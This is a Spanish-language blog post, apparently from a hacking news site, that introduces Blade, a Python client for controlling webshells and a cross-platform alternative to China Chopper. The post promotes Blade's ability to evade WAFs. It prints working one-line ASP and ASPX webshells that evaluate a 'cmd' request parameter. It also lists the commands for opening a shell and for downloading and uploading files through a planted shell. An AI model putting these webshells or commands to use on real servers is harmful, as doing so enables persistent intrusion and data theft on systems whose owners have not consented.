Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Blade: una nueva webshell ASP, PHP y JSP




Blade es una herramienta de conexión a webshell basado en consola, actualmente en fase de desarrollo que pretende ser una alternativa al chino Chooper.





¿Por qué? Pues porque Chooper es un cliente Webshell genial, que soporta muchos scripts del lado del servidor, pero sólo puede trabajar en Windows. De ahí la motivación de crear otro "Chooper" pero multiplataforma: compatible con Windows, Linux y Mac OS X.

Blade se basa en Python por lo que permite a los usuarios modificar los payloads de conexión del Webshell de manera que puede evadir algunos WAF que Chooper no puede. Sus funciones principales son:

  • Administra un servidor web con una sóla línea de código:
  • Compatible con PHP, ASP, ASPX y JSP
  • Proporciona una consola de terminal
  • Gestión de archivos y base de datos
Para que os hagáis una idea, algunos ejemplos de scripts del lado del servidor:


PHP: 
ASP: <%eval request("cmd")%>
ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

Obtener una shell:


python blade.py -u http: //localhost/shell.php -s php -p cmd
--shell
 
Descargar un archivo:


python blade.py -u http: //localhost/shell.php -s php -p cmd
--pull REMOTE_PATH local_path

Subir un archivo:


python blade.py -u http: //localhost/shell.php -s php -p cmd
--push local_path REMOTE_PATH
 
Actualmente sólo está desarrollado el soporte PHP y ASP y todavía no está implementada completamente la gestión de base de datos pero, si continúa su desarrollo, puede resultar un Webshell más que interesante:

Fuentes:
http://www.hackplayers.com/2016/01/blade-un-webshell-en-python-para-evadir-waf.html


0 comentarios :

Publicar un comentario en la entrada

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.